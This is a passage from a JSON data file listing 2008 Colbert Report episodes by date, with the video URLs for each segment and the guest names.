        "http://thecolbertreport.cc.com/videos/ci1ljt/peabody-on-mantel"
      ],
      "guest": "Neal Katyal, Jonathan Zittrain"
    },
    {
      "date": "2008-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b2ddmd/intro---6-18-08",
        "http://thecolbertreport.cc.com/videos/prx5o1/the-new-smurfs-movie",
        "http://thecolbertreport.cc.com/videos/ciovvr/the-word---lexicon-artist",
        "http://thecolbertreport.cc.com/videos/vtx5qc/barack-obama-s-church-search---dr--uma-mysorekar",
        "http://thecolbertreport.cc.com/videos/ir7gne/junot-diaz"
      ],
      "guest": "Dr. Uma Mysorekar, Junot Diaz"
    },
    {
      "date": "2008-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d6b6nb/intro---6-19-08",
        "http://thecolbertreport.cc.com/videos/6sj17e/shout-out---peabody-awards",
        "http://thecolbertreport.cc.com/videos/mr1053/sean-hannity-loves-america",
        "http://thecolbertreport.cc.com/videos/zcd35g/cookie-monster",
        "http://thecolbertreport.cc.com/videos/aytt4h/make-mccain-exciting-challenge---the-secret-of-mccain-s-brain",
        "http://thecolbertreport.cc.com/videos/m7daav/bishop-n-t--wright",
        "http://thecolbertreport.cc.com/videos/der3el/stephen-s-missing-peabody"
      ],
      "guest": "Bishop N.T. Wright"
    },
    {
      "date": "2008-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ua8qbe/intro---6-23-08",
        "http://thecolbertreport.cc.com/videos/a4nt5i/wriststrong-anniversary",
        "http://thecolbertreport.cc.com/videos/kj72hq/the-word---black-and-white",
        "http://thecolbertreport.cc.com/videos/vlidof/tip-wag---barack-obama",
        "http://thecolbertreport.cc.com/videos/ymze92/barbara-ehrenreich",
        "http://thecolbertreport.cc.com/videos/1f40by/sign-off---time-for-stephen-to-watch"
      ],
      "guest": "Barbara Ehrenreich"
    },
    {
      "date": "2008-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mhd7wr/intro---6-24-08",
        "http://thecolbertreport.cc.com/videos/n11h6w/hollywood-face-violence",
        "http://thecolbertreport.cc.com/videos/ov4362/oil-crisis",
        "http://thecolbertreport.cc.com/videos/hxtoyj/the-word---bleep",
        "http://thecolbertreport.cc.com/videos/f5yznc/dr--jason-bond",
        "http://thecolbertreport.cc.com/videos/ilejmp/will-smith"
      ],
      "guest": "Jason Bond, Will Smith"
    },
    {
      "date": "2008-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mdtg3q/intro---6-25-08",
        "http://thecolbertreport.cc.com/videos/q0qc77/paul-goldberger",
        "http://thecolbertreport.cc.com/videos/ajsxzq/judge--jury---executioner---whales",
        "http://thecolbertreport.cc.com/videos/zucjth/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/2r47v6/stephen-s-gun"
      ],
      "guest": "Paul Goldberger, Neil deGrasse Tyson"
    },
    {
      "date": "2008-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gvc60t/intro---6-26-08",
        "http://thecolbertreport.cc.com/videos/038ej3/stephen-and-sweetness",
        "http://thecolbertreport.cc.com/videos/txteih/the-tank-is-half-full---criminals",
        "http://thecolbertreport.cc.com/videos/hdan1z/difference-makers---steve-pelkey",
        "http://thecolbertreport.cc.com/videos/6vucxh/robert-wexler",
        "http://thecolbertreport.cc.com/videos/s7cul5/stephen-packs-for-his-trip"
      ],
      "guest": "Rep. Robert Wexler"
    },
    {
      "date": "2008-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a4vl00/intro---7-14-08",
        "http://thecolbertreport.cc.com/videos/t1ic5h/belgians-buy-budweiser",
        "http://thecolbertreport.cc.com/videos/e8zxmm/the-word---priceless",
        "http://thecolbertreport.cc.com/videos/6fnysv/barack-obama-s-church-search---lama-surya-das",
        "http://thecolbertreport.cc.com/videos/iuafl5/daniel-c--esty",
        "http://thecolbertreport.cc.com/videos/zeelo6/one-last-sip"
      ],
      "guest": "Lama Surya Das, Daniel C. Esty"
    },
    {
      "date": "2008-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/btd58c/intro---7-15-08",
        "http://thecolbertreport.cc.com/videos/iojfbw/the-new-yorker-cover",
        "http://thecolbertreport.cc.com/videos/4r3fs4/julia-e--sweig",
        "http://thecolbertreport.cc.com/videos/slbivd/difference-makers---donald-trump",
        "http://thecolbertreport.cc.com/videos/w3v1ei/jason-riley"
      ],
      "guest": "Julia E. Sweig, Jason Riley"
    },
    {
      "date": "2008-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/apzepe/intro---7-16-08",
        "http://thecolbertreport.cc.com/videos/nxgrjc/rush-is-here",
        "http://thecolbertreport.cc.com/videos/u9v0kj/the-word---placebo",
        "http://thecolbertreport.cc.com/videos/r6ylvr/alpha-dog-of-the-week---george-w--bush"
      ],
      "guest": "Rush"
    },
    {
      "date": "2008-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fv156w/intro---7-17-08",
        "http://thecolbertreport.cc.com/videos/hy6e1y/ofec",
        "http://thecolbertreport.cc.com/videos/fdazma/tip-wag---9-11-billboard",
        "http://thecolbertreport.cc.com/videos/75y9kg/green-screen-challenge---bill-o-reilly-rant",
        "http://thecolbertreport.cc.com/videos/ti6y23/elizabeth-edwards",
        "http://thecolbertreport.cc.com/videos/2i4pii/esquire-cover"
      ],
      "guest": "Elizabeth Edwards"
    },
    {
      "date": "2008-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ypasrv/exclusive---better-know-a-lobby---sierra-club",
        "http://thecolbertreport.cc.com/videos/298hev/intro---7-21-08",
        "http://thecolbertreport.cc.com/videos/2uxo91/barack-obama-s-elitist-summer-abroad",
        "http://thecolbertreport.cc.com/videos/ytt7lh/better-know-a-lobby---sierra-club",
        "http://thecolbertreport.cc.com/videos/7zt9o1/jim-webb"
      ],
      "guest": "Sen. Jim Webb"
    },
    {
      "date": "2008-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/isgn6o/intro---7-22-08",
        "http://thecolbertreport.cc.com/videos/5us80y/obama-s-trip",
        "http://thecolbertreport.cc.com/videos/twxrmk/the-word---fight-to-the-furnish",
        "http://thecolbertreport.cc.com/videos/g536lz/elton-john-s-new-ice-cream",
        "http://thecolbertreport.cc.com/videos/dqvjy7/south-carolina-is-so-gay",
        "http://thecolbertreport.cc.com/videos/ypbiy1/margaret-spellings"
      ],
      "guest": "Margaret Spellings"
    },
    {
      "date": "2008-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ephzov/intro---7-23-08",
        "http://thecolbertreport.cc.com/videos/008wql/starbucks-closings",
        "http://thecolbertreport.cc.com/videos/ckerul/the-word---join-the-european-union",
        "http://thecolbertreport.cc.com/videos/p099m0/colorofchange-org-petition",
        "http://thecolbertreport.cc.com/videos/ef4747/nas-pt--1"
      ],
      "guest": "Nas"
    },
    {
      "date": "2008-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9e4ipx/intro---7-24-08",
        "http://thecolbertreport.cc.com/videos/mzk1jw/john-mccain-s-sausage-party",
        "http://thecolbertreport.cc.com/videos/y6db2n/laurie-goodstein",
        "http://thecolbertreport.cc.com/videos/oyh9ck/threatdown---greek-courts",
        "http://thecolbertreport.cc.com/videos/qkxsxv/garrett-reisman",
        "http://thecolbertreport.cc.com/videos/my4p2n/decoder-rings"
      ],
      "guest": "Laurie Goodstein, Garrett Reisman"
    },
    {
      "date": "2008-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mv6ij/intro---7-28-08",
        "http://thecolbertreport.cc.com/videos/ahi7x5/obama-returns",
        "http://thecolbertreport.cc.com/videos/n5o1z2/heroic-refusal-to-discuss-robert-novak",
        "http://thecolbertreport.cc.com/videos/wksh33/trigger-happy---d-c--v--heller",
        "http://thecolbertreport.cc.com/videos/2fxv2r/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2008-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8y4ush/intro---7-29-08",
        "http://thecolbertreport.cc.com/videos/ft9iza/mccain-s-mustache",
        "http://thecolbertreport.cc.com/videos/je97nz/the-word---honest-belief",
        "http://thecolbertreport.cc.com/videos/079fu3/better-know-a-district---new-york-s-14th---carolyn-maloney",
        "http://thecolbertreport.cc.com/videos/4pok23/eric-roston"
      ],
      "guest": "Eric Roston"
    },
    {
      "date": "2008-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aej937/intro---7-30-08",
        "http://thecolbertreport.cc.com/videos/0igq3j/fat-cat",
        "http://thecolbertreport.cc.com/videos/z8lld1/the-word---save-ferris",
        "http://thecolbertreport.cc.com/videos/77hd54/spiders-for-stephen-",
        "http://thecolbertreport.cc.com/videos/9riu8g/canton-apology",
        "http://thecolbertreport.cc.com/videos/paplnu/crosby--stills---nash-pt--1"
      ],
      "guest": "Crosby, Stills &amp; Nash"
    },
    {
      "date": "2008-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2yeaq8/intro---7-31-08",
        "http://thecolbertreport.cc.com/videos/cy7kpu/starbucks-cuts-jobs",
        "http://thecolbertreport.cc.com/videos/evgv9c/brendan-koerner",
        "http://thecolbertreport.cc.com/videos/3pi9ch/cheating-death---swimming-safety",
        "http://thecolbertreport.cc.com/videos/k8sku2/buzz-aldrin",
        "http://thecolbertreport.cc.com/videos/xrkpup/thanks-to-the-guests"
      ],
      "guest": "Brendan I. Koerner, Buzz Aldrin"
    },
    {
      "date": "2008-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y56p3h/intro---8-4-08",
        "http://thecolbertreport.cc.com/videos/j7c1ly/democrats--five-week-recess",
        "http://thecolbertreport.cc.com/videos/n4qhgk/the-word---we-the-people",
        "http://thecolbertreport.cc.com/videos/gjy6co/ryan-seacrest-s-shark-attack",
        "http://thecolbertreport.cc.com/videos/j0iwzv/lucas-conley"
      ],
      "guest": "Lucas Conley, The Apples in Stereo"
    },
    {
      "date": "2008-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0b9ndt/intro---8-5-08",
        "http://thecolbertreport.cc.com/videos/a60qui/starbucks-promotion",
        "http://thecolbertreport.cc.com/videos/ts3set/obama-s-energy-plan---tire-gauges",
        "http://thecolbertreport.cc.com/videos/c8orpt/the-word---divided-we-win",
        "http://thecolbertreport.cc.com/videos/u7dbu9/canton--kansas-apology",
        "http://thecolbertreport.cc.com/videos/sw0u58/david-carr",
        "http://thecolbertreport.cc.com/videos/zghj54/obsessive-compulsive-checklist"
      ],
      "guest": "David Carr"
    },
    {
      "date": "2008-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j12mau/intro---8-6-08",
        "http://thecolbertreport.cc.com/videos/ad4cbz/ignorance-history-month",
        "http://thecolbertreport.cc.com/videos/v2zmtk/spida-of-love---jason-bond",
        "http://thecolbertreport.cc.com/videos/luli3g/colbert-platinum---the-dribble-down-effect",
        "http://thecolbertreport.cc.com/videos/3pe5h3/kevin-costner",
        "http://thecolbertreport.cc.com/videos/ot8cw0/spanish-audio"
      ],
      "guest": "Jason Bond, Kevin Costner"
    },
    {
      "date": "2008-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bxoz3a/intro---8-7-08",
        "http://thecolbertreport.cc.com/videos/e6qhsv/osama-bin-laden-s-driver-guilty",
        "http://thecolbertreport.cc.com/videos/f3opxi/sport-report---devin-gordon",
        "http://thecolbertreport.cc.com/videos/6u4m61/tip-wag---exxon-s-record-profits",
        "http://thecolbertreport.cc.com/videos/dmymte/thomas-frank",
        "http://thecolbertreport.cc.com/videos/iwrdpe/reading-newsweek"
      ],
      "guest": "Devin Gordon, Thomas Frank"
    },
    {
      "date": "2008-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jk0e27/intro---8-11-08",
        "http://thecolbertreport.cc.com/videos/riwpa4/esteban-loves-jorge-ramos",
        "http://thecolbertreport.cc.com/videos/bfwvvn/the-word---catharsis",
        "http://thecolbertreport.cc.com/videos/txv0gu/nailed--em---medical-marijuana",
        "http://thecolbertreport.cc.com/videos/8j40t0/jorge-ramos",
        "http://thecolbertreport.cc.com/videos/b7houz/stephen-wants-snacks"
      ],
      "guest": "Jorge Ramos"
    },
    {
      "date": "2008-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kt49i5/intro---8-12-08",
        "http://thecolbertreport.cc.com/videos/zgupdj/unsubstantiated-rumors",
        "http://thecolbertreport.cc.com/videos/6d57uu/olympic-opening-ceremony",
        "http://thecolbertreport.cc.com/videos/5njkui/joey-cheek",
        "http://thecolbertreport.cc.com/videos/jhg2wn/canton--south-dakota-apology",
        "http://thecolbertreport.cc.com/videos/bv3152/jane-mayer",
        "http://thecolbertreport.cc.com/videos/dwnfyl/reading-the-national-enquirer"
      ],
      "guest": "Joey Cheek, Jane Mayer"
    },
    {
      "date": "2008-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o7nbb7/intro---8-13-08",
        "http://thecolbertreport.cc.com/videos/zewvls/stephen-s-world-record",
        "http://thecolbertreport.cc.com/videos/3ae93q/john-mccain-steals-from-wikipedia",
        "http://thecolbertreport.cc.com/videos/htzkd9/the-word---blame-monica-goodling",
        "http://thecolbertreport.cc.com/videos/1clyqz/formidable-opponent---offshore-drilling",
        "http://thecolbertreport.cc.com/videos/yplzsy/dick-meyer",
        "http://thecolbertreport.cc.com/videos/x9tyb8/goodbye-from-wprg"
      ],
      "guest": "Dick Meyer"
    },
    {
      "date": "2008-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/481cqy/intro---8-14-08",
        "http://thecolbertreport.cc.com/videos/0gs1a9/jeopardy-shout-out",
        "http://thecolbertreport.cc.com/videos/s99fxp/threatdown---killer-iphones",
        "http://thecolbertreport.cc.com/videos/9x55ta/the-1952-helsinki-games---the-reindeer-roars",
        "http://thecolbertreport.cc.com/videos/ebnqyp/bing-west",
        "http://thecolbertreport.cc.com/videos/h0yxjt/gold-medals"
      ],
      "guest": "Bing West"
    },
    {
      "date": "2008-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r6ivli/intro---8-26-08",
        "http://thecolbertreport.cc.com/videos/zpxtn2/burning-man-festival-confusion",
        "http://thecolbertreport.cc.com/videos/ez5jp1/michelle-obama-s-speech",
        "http://thecolbertreport.cc.com/videos/tojy8p/anniversary-pandering",
        "http://thecolbertreport.cc.com/videos/ax1v4e/bob-barr",
        "http://thecolbertreport.cc.com/videos/f120f5/scott-mcclellan",
        "http://thecolbertreport.cc.com/videos/twqqkj/up-next"
      ],
      "guest": "Rep. Bob Barr, Scott McClellan"
    },
    {
      "date": "2008-08-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mb4pgm/intro---8-27-08",
        "http://thecolbertreport.cc.com/videos/63yvi3/live-from-dynasty",
        "http://thecolbertreport.cc.com/videos/xfzios/hillary-clinton-supports-barack-obama",
        "http://thecolbertreport.cc.com/videos/m1mag5/repo-man",
        "http://thecolbertreport.cc.com/videos/402muh/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/llvqjv/stephanie-tubbs-jones-tribute"
      ],
      "guest": "Gov. Mike Huckabee"
    },
    {
      "date": "2008-08-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ua1ppo/intro---8-28-08",
        "http://thecolbertreport.cc.com/videos/9lke5e/high-altitude-brownies",
        "http://thecolbertreport.cc.com/videos/53s26i/the-word---acid-flashback",
        "http://thecolbertreport.cc.com/videos/kmna3f/dnc-formal-roll-call",
        "http://thecolbertreport.cc.com/videos/eifqog/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/c42fhd/stephen-s-brownies"
      ],
      "guest": "Rick Brookhiser"
    },
    {
      "date": "2008-08-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7p5vgn/intro---8-29-08",
        "http://thecolbertreport.cc.com/videos/ctsiz5/sarah-palin-for-vp",
        "http://thecolbertreport.cc.com/videos/9os3w0/better-know-a-lobby---secular-coalition-for-america",
        "http://thecolbertreport.cc.com/videos/rufbl6/john-mcwhorter",
        "http://thecolbertreport.cc.com/videos/bzvjxb/revenge-of-the-styrofoam-cups"
      ],
      "guest": "John McWhorter"
    },
    {
      "date": "2008-09-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hp450x/intro---9-2-08",
        "http://thecolbertreport.cc.com/videos/8tw46w/stephen-from-four-years-ago",
        "http://thecolbertreport.cc.com/videos/rf8uos/the-word---that-s-the-ticket",
        "http://thecolbertreport.cc.com/videos/gmnlx9/green-screen-challenge---last-shot",
        "http://thecolbertreport.cc.com/videos/f81p33/laura-d-andrea-tyson",
        "http://thecolbertreport.cc.com/videos/xhysj6/blowing-your-mind"
      ],
      "guest": "Laura D'Andrea Tyson"
    },
    {
      "date": "2008-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gujtwh/intro---9-3-08",
        "http://thecolbertreport.cc.com/videos/kepht9/stephen-is-in-new-orleans",
        "http://thecolbertreport.cc.com/videos/sbatmc/rnc-tuesday",
        "http://thecolbertreport.cc.com/videos/awnw4i/susan-eisenhower-endorses-obama",
        "http://thecolbertreport.cc.com/videos/4cdiam/john-mccain--her-story",
        "http://thecolbertreport.cc.com/videos/x8u7qp/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/rk1eeg/who-wants-beads-"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2008-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nvj1zq/intro---9-4-08",
        "http://thecolbertreport.cc.com/videos/1cwp12/stuck-in-atlanta-airport",
        "http://thecolbertreport.cc.com/videos/kyo8u3/adam-brickley",
        "http://thecolbertreport.cc.com/videos/c6ux4z/tip-wag---rnc-edition",
        "http://thecolbertreport.cc.com/videos/yywrwl/ron-paul",
        "http://thecolbertreport.cc.com/videos/kwoupb/flight-out-of-atlanta"
      ],
      "guest": "Adam Brickley, Ron Paul"
    },
    {
      "date": "2008-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg1oxm/intro---9-5-08",
        "http://thecolbertreport.cc.com/videos/2rjlbj/stephen-missed-the-convention",
        "http://thecolbertreport.cc.com/videos/njb4bu/green-screen-challenge---john-mccain-s-acceptance-speech",
        "http://thecolbertreport.cc.com/videos/zk7gig/better-know-a-district---georgia-s-8th---lynn-westmoreland-update",
        "http://thecolbertreport.cc.com/videos/xeizbt/david-paterson",
        "http://thecolbertreport.cc.com/videos/u3k61y/green-screen-challenge---go-nuts"
      ],
      "guest": "Gov. David Paterson"
    },
    {
      "date": "2008-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jshk87/exclusive---charlene--i-m-right-behind-you----rock-band-2",
        "http://thecolbertreport.cc.com/videos/jfwpwo/intro---9-15-08",
        "http://thecolbertreport.cc.com/videos/7yzozt/colbert-shopping-network",
        "http://thecolbertreport.cc.com/videos/f9h01l/the-word---how-dare-you-",
        "http://thecolbertreport.cc.com/videos/r0u91k/colbert-platinum---supermodel-statue",
        "http://thecolbertreport.cc.com/videos/ihx562/peter-j--gomes",
        "http://thecolbertreport.cc.com/videos/4ebszq/another-episode"
      ],
      "guest": "Rev. Peter J. Gomes"
    },
    {
      "date": "2008-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/urn1ti/intro---9-16-08",
        "http://thecolbertreport.cc.com/videos/k0bsca/financial-advice-from-gorlock",
        "http://thecolbertreport.cc.com/videos/mkpl4k/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/75xh2f/threatdown---icebergs-",
        "http://thecolbertreport.cc.com/videos/3tm40j/rick-reilly",
        "http://thecolbertreport.cc.com/videos/vnf5o3/thirty-minutes"
      ],
      "guest": "Tyson Slocum, Rick Reilly"
    },
    {
      "date": "2008-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4l5nqm/intro---9-17-08",
        "http://thecolbertreport.cc.com/videos/y012iz/mccain-attacks-obama",
        "http://thecolbertreport.cc.com/videos/kyb0cu/the-word---powerless",
        "http://thecolbertreport.cc.com/videos/n6eo9j/country-first",
        "http://thecolbertreport.cc.com/videos/uwjjvf/bob-lutz",
        "http://thecolbertreport.cc.com/videos/3odd8c/stephen---the-colberts--music-video"
      ],
      "guest": "Bob Lutz"
    },
    {
      "date": "2008-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/crbm2j/intro---9-18-08",
        "http://thecolbertreport.cc.com/videos/1jklj8/stephen-wants-an-emmy",
        "http://thecolbertreport.cc.com/videos/j1rb59/smokin--pole---american-arctic-expert",
        "http://thecolbertreport.cc.com/videos/jgr23t/richard-garriott-takes-stephen-to-space",
        "http://thecolbertreport.cc.com/videos/r2z9cm/maria-bartiromo",
        "http://thecolbertreport.cc.com/videos/f0iah5/off-to-the-emmys"
      ],
      "guest": "Maria Bartiromo"
    },
    {
      "date": "2008-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s3o9jz/intro---9-23-08",
        "http://thecolbertreport.cc.com/videos/ikji5j/stephen-loses-to-don-rickles",
        "http://thecolbertreport.cc.com/videos/vj8wko/the-word---ohmygodsocietyiscollapsing---",
        "http://thecolbertreport.cc.com/videos/bna75w/peter-grosz-insults",
        "http://thecolbertreport.cc.com/videos/iscpss/john-mccain-s-theme-song",
        "http://thecolbertreport.cc.com/videos/8uwmb0/jackson-browne"
      ],
      "guest": "Jackson Browne"
    },
    {
      "date": "2008-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5k16zp/intro---9-24-08",
        "http://thecolbertreport.cc.com/videos/zxun4o/stephen-suspends-the-show",
        "http://thecolbertreport.cc.com/videos/y03i0s/joe-nocera",
        "http://thecolbertreport.cc.com/videos/ug1eaa/alpha-dog-of-the-week---bill-bennett",
        "http://thecolbertreport.cc.com/videos/m77ip1/cornel-west",
        "http://thecolbertreport.cc.com/videos/5lq5u2/colbertnation-com"
      ],
      "guest": "Joe Nocera, Cornel West"
    },
    {
      "date": "2008-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c2lklm/intro---9-25-08",
        "http://thecolbertreport.cc.com/videos/n6lmpg/stephen-settles-the-debate---fdr-vs--tr",
        "http://thecolbertreport.cc.com/videos/k6o1ga/now-s-presidential-endorsement---kim-gandy",
        "http://thecolbertreport.cc.com/videos/bqde8h/nicholas-carr",
        "http://thecolbertreport.cc.com/videos/c44c8h/one-more-thing"
      ],
      "guest": "Nicholas Carr"
    },
    {
      "date": "2008-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1c54hn/intro---9-29-08",
        "http://thecolbertreport.cc.com/videos/05f4cg/the-first-debate-winner",
        "http://thecolbertreport.cc.com/videos/bweuwc/the-word---ye-of-little-faith",
        "http://thecolbertreport.cc.com/videos/cgij7r/cheating-death---car-bacteria",
        "http://thecolbertreport.cc.com/videos/vp621m/paul-begala",
        "http://thecolbertreport.cc.com/videos/gpa8yw/good-night"
      ],
      "guest": "Paul Begala"
    },
    {
      "date": "2008-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y8hkhe/intro---9-30-08",
        "http://thecolbertreport.cc.com/videos/9st6mt/partisanship-kills-the-bailout",
        "http://thecolbertreport.cc.com/videos/f9oh9q/prescott-oil-loves-the-earth",
        "http://thecolbertreport.cc.com/videos/d0zdru/tip-wag---wall-street-jagoffs",
        "http://thecolbertreport.cc.com/videos/j67wur/out-of-time"
      ],
      "guest": "James Taylor"
    },
    {
      "date": "2008-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t7tnvd/exclusive---nas-plays-rock-band",
        "http://thecolbertreport.cc.com/videos/y8hkhe/intro---9-30-08",
        "http://thecolbertreport.cc.com/videos/9st6mt/partisanship-kills-the-bailout",
        "http://thecolbertreport.cc.com/videos/f9oh9q/prescott-oil-loves-the-earth",
        "http://thecolbertreport.cc.com/videos/d0zdru/tip-wag---wall-street-jagoffs",
        "http://thecolbertreport.cc.com/videos/j67wur/out-of-time"
      ],
      "guest": "Dave Levin"
    },
    {
      "date": "2008-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eqbu4l/intro---10-01-08",
        "http://thecolbertreport.cc.com/videos/ovyu4c/campbell-s-soup-stock",
        "http://thecolbertreport.cc.com/videos/bhfa94/the-word---future-perfect",
        "http://thecolbertreport.cc.com/videos/86s1x0/colbert-teen-talk---voter-abstinence",
        "http://thecolbertreport.cc.com/videos/1v6olb/dave-levin",
        "http://thecolbertreport.cc.com/videos/e5ngk1/you-snooze--you-lose"
      ],
      "guest": "Dave Levin"
    },
    {
      "date": "2008-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zc7pti/intro---10-02-08",
        "http://thecolbertreport.cc.com/videos/jwi5c6/stephen-shoots-an-audience-member",
        "http://thecolbertreport.cc.com/videos/nkfn9g/shakespearean-candidates---stephen-greenblatt",
        "http://thecolbertreport.cc.com/videos/9cm5sl/formidable-opponent---business-syphilis",
        "http://thecolbertreport.cc.com/videos/kvfh5w/naomi-klein",
        "http://thecolbertreport.cc.com/videos/xsttzx/that-s-all-she-wrote"
      ],
      "guest": "Stephen Greenblatt, Naomi Klein"
    },
    {
      "date": "2008-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xxiviw/intro---10-6-08",
        "http://thecolbertreport.cc.com/videos/1hb3kb/oj-simpson-guilty",
        "http://thecolbertreport.cc.com/videos/qlbk95/the-word---maverick-without-a-cause",
        "http://thecolbertreport.cc.com/videos/qnwvgs/un-american-news---financial-edition",
        "http://thecolbertreport.cc.com/videos/tn9q1r/jim-cramer",
        "http://thecolbertreport.cc.com/videos/gpjjik/life-drawing-lesson"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2008-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lr7n1e/intro---10-7-08",
        "http://thecolbertreport.cc.com/videos/ehcjcu/stephen-s-town-hall",
        "http://thecolbertreport.cc.com/videos/yulr8u/threatdown---zombies",
        "http://thecolbertreport.cc.com/videos/e56sfz/the-red-lending-menace",
        "http://thecolbertreport.cc.com/videos/xoy3ny/nate-silver",
        "http://thecolbertreport.cc.com/videos/0t800l/phone-book"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2008-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wnllod/intro---10-08-08",
        "http://thecolbertreport.cc.com/videos/rb63v8/town-hall-fashion-apology",
        "http://thecolbertreport.cc.com/videos/pmvhoi/the-second-presidential-debate",
        "http://thecolbertreport.cc.com/videos/r8hb9t/atone-phone---gilbert-gottfried",
        "http://thecolbertreport.cc.com/videos/7943ea/joe-scarborough",
        "http://thecolbertreport.cc.com/videos/02dsh7/stephen-s-post-show-routine"
      ],
      "guest": "Joe Scarborough"
    },
    {
      "date": "2008-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cbxmlr/intro---10-09-08",
        "http://thecolbertreport.cc.com/videos/l3uq93/dismayed-stockbroker-photos",
        "http://thecolbertreport.cc.com/videos/pqsng6/campaign-personal-attacks---david-gergen",
        "http://thecolbertreport.cc.com/videos/f6283x/who-s-not-honoring-me-now----nepal",
        "http://thecolbertreport.cc.com/videos/ge3feb/oliver-stone",
        "http://thecolbertreport.cc.com/videos/w87c40/bad-news"
      ],
      "guest": "David Gergen, Oliver Stone"
    },
    {
      "date": "2008-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5c0f2m/intro---10-13-08",
        "http://thecolbertreport.cc.com/videos/fnytnd/mccain-crossword-clue",
        "http://thecolbertreport.cc.com/videos/1jl5yn/the-computer-menace---bethany-mclean",
        "http://thecolbertreport.cc.com/videos/1goeih/bears---balls---salt-based-economy",
        "http://thecolbertreport.cc.com/videos/gyyaxy/kathleen-parker",
        "http://thecolbertreport.cc.com/videos/6y4q65/happy-birthday"
      ],
      "guest": "Bethany McLean, Kathleen Parker"
    },
    {
      "date": "2008-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n5hrc3/intro---10-14-08",
        "http://thecolbertreport.cc.com/videos/7pd7zc/paul-krugman-s-nobel-prize",
        "http://thecolbertreport.cc.com/videos/r0q5ve/the-word---p-o-w-",
        "http://thecolbertreport.cc.com/videos/pfbd0x/tip-wag---palin-s-newsweek-cover",
        "http://thecolbertreport.cc.com/videos/usq8wp/joseph-stiglitz",
        "http://thecolbertreport.cc.com/videos/lvn4rk/good-night"
      ],
      "guest": "Joseph Stiglitz"
    },
    {
      "date": "2008-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zwbmit/intro---10-15-08",
        "http://thecolbertreport.cc.com/videos/9308mk/kfc-snacker",
        "http://thecolbertreport.cc.com/videos/l7yb6p/the-word---freaky-three-way-calling",
        "http://thecolbertreport.cc.com/videos/4e7lhp/sport-report---lame-sports-edition",
        "http://thecolbertreport.cc.com/videos/38m5c1/tina-brown",
        "http://thecolbertreport.cc.com/videos/8g4g6k/chest-tivo"
      ],
      "guest": "Tina Brown"
    },
    {
      "date": "2008-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wiiett/intro---10-16-08",
        "http://thecolbertreport.cc.com/videos/clx1g3/the-final-debate",
        "http://thecolbertreport.cc.com/videos/irar1b/portrait-accepted---brent-glass",
        "http://thecolbertreport.cc.com/videos/vhpq80/robert-greenwald",
        "http://thecolbertreport.cc.com/videos/dtl1jb/a-new-portrait"
      ],
      "guest": "Brent Glass, Robert Greenwald"
    },
    {
      "date": "2008-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/icr62o/intro---10-20-08",
        "http://thecolbertreport.cc.com/videos/hztig3/colin-powell-endorses-barack-obama",
        "http://thecolbertreport.cc.com/videos/m2bwgq/fareed-zakaria",
